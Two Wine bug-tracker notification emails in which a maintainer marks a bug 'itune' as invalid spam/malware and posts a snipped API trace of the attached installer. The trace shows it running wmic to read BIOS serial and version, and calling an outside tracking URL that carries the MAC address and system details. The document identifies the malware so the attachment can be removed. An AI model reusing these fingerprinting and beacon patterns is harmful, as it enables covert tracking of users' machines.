https://bugs.winehq.org/show_bug.cgi?id=37365 Anastasius Focht <focht(a)gmx.net> changed: What |Removed |Added ---------------------------------------------------------------------------- Status|UNCONFIRMED |RESOLVED CC| |focht(a)gmx.net Resolution|--- |INVALID Summary|itune |spam/malware --- Comment #1 from Anastasius Focht <focht(a)gmx.net> --- Hello folks, invalid. Wine's trace capability is also good for analysing malware .. kinda stupid code though. --- snip --- ... 0035:Call KERNEL32.CreateProcessA(00000000,00409b80 "C:\\users\\focht\\Temp\\baccabebbbha.exe /PID=10096 /SUBPID=0 /NETWORKID=1 /DISTID=19132 /CID=0 /PRODUCT_ID=13577 /SERVER_URL=`omn7).`ip`[o're_,]pnn%ok_`e-_ok /CLICKID= /D1=4 /D2=-1 /D3=-1 /D4=-1 /D5=-1 /PRODUCT_PRIVACY= /PRODUCT_EULA= /PRODUCT_NAME=aOnlbm /EXE_URL=`omnp4.+sc^mm^+^johdlg\\)Znmfd*cmh'"...,00000000,00000000,00000000,00000000,00000000,00000000,0042bfe8,0033fa74) ret=00405297 ... 0037:Call KERNEL32.__wine_kernel_init() ret=7bc5a089 0035:Ret KERNEL32.CreateProcessA() retval=00000001 ret=00405297 0035:Call KERNEL32.CloseHandle(00000068) ret=004052a4 0035:Ret KERNEL32.CloseHandle() retval=00000001 ret=004052a4 0035:Call KERNEL32.WaitForSingleObject(00000064,00000064) ret=00401e57 ... 0037:Call KERNEL32.CreateProcessW(00000000,004d78e8 L"wmic /output:C:\\users\\focht\\Temp\\91412521814.aaa bios get serialnumber",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146 ... 0039:Call KERNEL32.__wine_kernel_init() ret=7bc5a089 0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146 ... 0039:Starting process L"C:\\windows\\system32\\wmic.exe" (entryproc=0x7edfc33c) ... Error: Command line not supported ... 0039:Call KERNEL32.ExitProcess(ffffffff) ret=7edfc3ca ... 0037:Call KERNEL32.CreateProcessW(00000000,004d8a38 L"wmic /output:C:\\users\\focht\\Temp\\91412521814.aaa bios get version",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146 ... 003b:Call KERNEL32.__wine_kernel_init() ret=7bc5a089 0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146 ... 0037:Call winhttp.WinHttpCrackUrl(004d9648 L"http://direct.the-apps-track.com/Installer/Flow?pubid=10096&distid=19132&productid=13577&subpubid=0&campaignid=0&networkid=1&dfb=-1&os=5.1&ospv=-1&iev=8.0&ffv=&chromev=&macaddress=70:71:BC:F0:11:B7&netv=&d1=4&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=105-84-117-110-101-115&cookieeula=&cookiepriv"...,00000170,00000000,0033e2f4) ret=00477b6c ... --- snip --- Admin please delete the attachment, it's malware (trojan/backdoor). ... or do you want me to make this malware to work perfectly with Wine? :) Regards -- Do not reply to this email, post in Bugzilla using the above URL to reply. You are receiving this mail because: You are watching all bug changes.

https://bugs.winehq.org/show_bug.cgi?id=37365 Bruno Jesus <00cpxxx(a)gmail.com> changed: What |Removed |Added ---------------------------------------------------------------------------- Status|RESOLVED |CLOSED --- Comment #3 from Bruno Jesus <00cpxxx(a)gmail.com> --- Closing invalid bugs. -- Do not reply to this email, post in Bugzilla using the above URL to reply. You are receiving this mail because: You are watching all bug changes.